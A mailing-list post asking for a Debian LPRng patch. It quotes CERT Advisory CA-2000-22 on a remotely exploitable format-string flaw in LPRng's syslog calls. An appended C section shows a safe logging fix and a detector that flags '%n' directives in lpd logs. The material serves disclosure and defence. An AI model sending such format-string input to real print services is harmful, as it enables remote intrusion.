
lprng




Does anyone know where I can find a Debian-specific patch for the
lprng package?

Thanks in advance.

Why? Just read the following...

> Subject: CERT Advisory CA-2000-22
> 
> 
> 
> CERT Advisory CA-2000-22 Input Validation Problems in LPRng
> 
>    Original release date: December 12, 2000
>    Last updated: --
>    Source: CERT/CC
> 
>    A complete revision history is at the end of this file.
> 
> Systems Affected
> 
>      * Systems running unpatched LPRng software
> 
> Overview
> 
>    A popular replacement software package to the BSD lpd printing service
>    called LPRng contains at least one software defect, known as a "format
>    string vulnerability,"[1] which may allow remote users to execute
>    arbitrary code on vulnerable systems.
> 
> I. Description
> 
>    LPRng, now being packaged in several open-source operating system
>    distributions, has a missing format string argument in at least two
>    calls to the syslog() function.
> 
>    Missing format strings in function calls allow user-supplied arguments
>    to be passed to a susceptible *snprintf() function call. Remote users
>    with access to the printer port (port 515/tcp) may be able to pass
>    format-string parameters that can overwrite arbitrary addresses in the
>    printing service's address space. Such overwriting can cause
>    segmentation violations leading to denial of printing services or to
>    the execution of arbitrary code injected through other means into the
>    memory segments of the printer service.
> 
>    Sample syslog entries from successful exploitation of this
>    vulnerability have been reported, as follows:
> 
> Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
> 
>    This vulnerability has been assigned the identifier CAN-2000-0917 by
>    the Common Vulnerabilities and Exposures (CVE) group:
> 
>           http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
> 
>    The CERT/CC has received reports of extensive probing to port 515/tcp.
>    In addition, we have received some reports of systems compromised
>    using this vulnerability. Tools exploiting this vulnerability have
>    been posted to public forums.
> 
> II. Impact
> 
>    A remote user may be able to execute arbitrary code with elevated
>    privileges.
> 
>    In addition, the printing service may be disrupted or disabled
>    entirely.
> 
> III. Solution
> 
> Apply a patch from your vendor
> 
>    Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
>    the vendor sections below. Alternately, you can obtain the version of
>    LPRng which fixes the missing format string at:
> 
>           ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
> 
> Disallow access to printer service ports (typically 515/tcp) using firewall
> or packet-filtering technologies
> 
>    Blocking access to the vulnerable service will limit your exposure to
>    attacks from outside your network perimeter. However, the
>    vulnerability would still allow local users to gain privileges they
>    normally shouldn't have; in addition, blocking port 515/tcp at a
>    network perimeter would still allow any remote user inside the
>    perimeter to exploit the vulnerability.
> 
> Appendix A. Vendor Information
> 
> Apple
> 
>    Apple has conducted an investigation and determined that Mac OS X
>    Public Beta and Mac OS X Server do not use LPRng and are therefore not
>    vulnerable to this exploitation.
> 
> Caldera OpenLinux
> 
>    See CSSA-2000-033.0 "format bug in LPRng" at:
> 
>           http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
> 
> Compaq Computer Corporation
> 
>    Compaq Tru64 UNIX S/W is not vulnerable.
> 
> FreeBSD
> 
>    FreeBSD does not include LPRng in the base system. Older versions of
>    FreeBSD included a vulnerable version of LPRng in the Ports Collection
>    but this was corrected almost 2 months ago, prior to the release of
>    FreeBSD 4.2. See FreeBSD Security Advisory 00:56
>    (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc)
>    for more information.
> 
> Hewlett-Packard Company
> 
>    This does not apply to HP; HP does not ship LPRng on HP-UX.
> 
> IBM
> 
>    IBM's AIX operating system is not vulnerable to this security exploit.
> 
> Microsoft Corporation
> 
>    Microsoft doesn't use LPRng in any of its products, so no Microsoft
>    products are affected by the vulnerability.
> 
> NetBSD
> 
>    NetBSD does not include LPRng in the base system; however we do have a
>    third-party package of LPRng-3.6.8 which is vulnerable. There's work
>    underway to upgrade it to a non-vulnerable version.
> 
> OpenBSD
> 
>    OpenBSD does not ship lprng.
> 
> RedHat
> 
>    LPRng Version 3.6.24 and earlier is vulnerable.
> 
>    See RHSA-2000:065-04 at:
> 
>           http://www.redhat.com/support/errata/RHSA-2000-065-06.html
> 
> SGI
> 
>    IRIX does not contain LPRng support.
> 
> SuSE
> 
>    SuSE is not vulnerable. Please see additional comments at:
> 
>           http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
> 
> References
> 
>     1. VU#382365: LPRng can pass user-supplied input as a format string
>        parameter to syslog() calls, CERT/CC, 10/06/2000,
>        https://www.kb.cert.org/vuls/id/382365
>    _________________________________________________________________
> 
>    The CERT Coordination Center thanks Chris Evans for his initial report
>    on the vulnerability described in this advisory.
>    _________________________________________________________________
> 
>    Author: This document was written by Jeffrey S Havrilla. Feedback on
>    this advisory is appreciated.
>    ______________________________________________________________________
> 
>    This document is available from:
>    http://www.cert.org/advisories/CA-2000-22.html
>    ______________________________________________________________________
> 
> CERT/CC Contact Information
> 
>    Email: cert@cert.org
>           Phone: +1 412-268-7090 (24-hour hotline)
>           Fax: +1 412-268-6989
>           Postal address:
>           CERT Coordination Center
>           Software Engineering Institute
>           Carnegie Mellon University
>           Pittsburgh PA 15213-3890
>           U.S.A.
> 
>    CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
>    Monday through Friday; they are on call for emergencies during other
>    hours, on U.S. holidays, and on weekends.
> 
> Using encryption
> 
>    We strongly urge you to encrypt sensitive information sent by email.
>    Our public PGP key is available from
> 
>    http://www.cert.org/CERT_PGP.key
> 
>    If you prefer to use DES, please call the CERT hotline for more
>    information.
> 
> Getting security information
> 
>    CERT publications and other security information are available from
>    our web site
> 
>    http://www.cert.org/
> 
>    To subscribe to the CERT mailing list for advisories and bulletins,
>    send email to majordomo@cert.org. Please include in the body of your
>    message
> 
>    subscribe cert-advisory
> 
>    * "CERT" and "CERT Coordination Center" are registered in the U.S.
>    Patent and Trademark Office.
>    ______________________________________________________________________
> 
>    NO WARRANTY
>    Any material furnished by Carnegie Mellon University and the Software
>    Engineering Institute is furnished on an "as is" basis. Carnegie
>    Mellon University makes no warranties of any kind, either expressed or
>    implied as to any matter including, but not limited to, warranty of
>    fitness for a particular purpose or merchantability, exclusivity or
>    results obtained from use of the material. Carnegie Mellon University
>    does not make any warranty of any kind with respect to freedom from
>    patent, trademark, or copyright infringement.
>    _________________________________________________________________
> 
>    Conditions for use, disclaimers, and sponsorship information
> 
>    Copyright 2000 Carnegie Mellon University.
> 
>    Revision History
>        Dec 12, 2000: Initial Release
> 
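As an added example (not part of the original post, the advisory, or LPRng's own source): the corrected logging pattern that the advisory's fix amounts to, passing the request as an argument to a fixed "%s" format rather than as the format itself, next to a small scanner a defender can run over lpd syslog output to flag "bad request line" entries carrying "%n" directives. The function names and the sample log lines are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Scan untrusted text for printf-style conversion directives. A print
 * request line carries queue names and job data, never "%n" or "%300$n";
 * those only appear when someone is feeding a format string to an
 * unguarded syslog()/snprintf() call. Returns the directive count and
 * sets *has_n when a write directive ("%n") is present. */
int count_format_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* "%%" is a literal '%' */
        while (*p && (isdigit((unsigned char)*p) || strchr("-+ #.$", *p)))
            p++;                                 /* flags, width, precision, n$ */
        while (*p && strchr("hlLqjzt", *p))
            p++;                                 /* length modifiers */
        if (!*p) break;
        if (strchr("diouxXeEfgGcspn", *p)) {
            count++;
            if (*p == 'n') *has_n = 1;
        }
    }
    return count;
}

/* The corrected logging pattern: the request is always an argument,
 * never the format, so any '%' inside it is copied verbatim. Hypothetical
 * illustration of the fix described in the advisory, not LPRng's code. */
int format_bad_request_log(char *out, size_t outlen, const char *request)
{
    return snprintf(out, outlen, "Dispatch_input: bad request line '%s'", request);
}

/* Detection over syslog output: returns 1 for a "bad request line" entry
 * whose quoted request contains a "%n" directive, 0 otherwise. */
int is_suspect_request_log(const char *logline)
{
    const char *quoted = strstr(logline, "bad request line '");
    int has_n;
    if (!quoted) return 0;
    count_format_directives(quoted, &has_n);
    return has_n;
}
```

Note that a benign request such as "100% done" parses as a "% d" directive, so the directive count alone is noisy; the "%n" check is the strong signal, since only a write directive can corrupt memory.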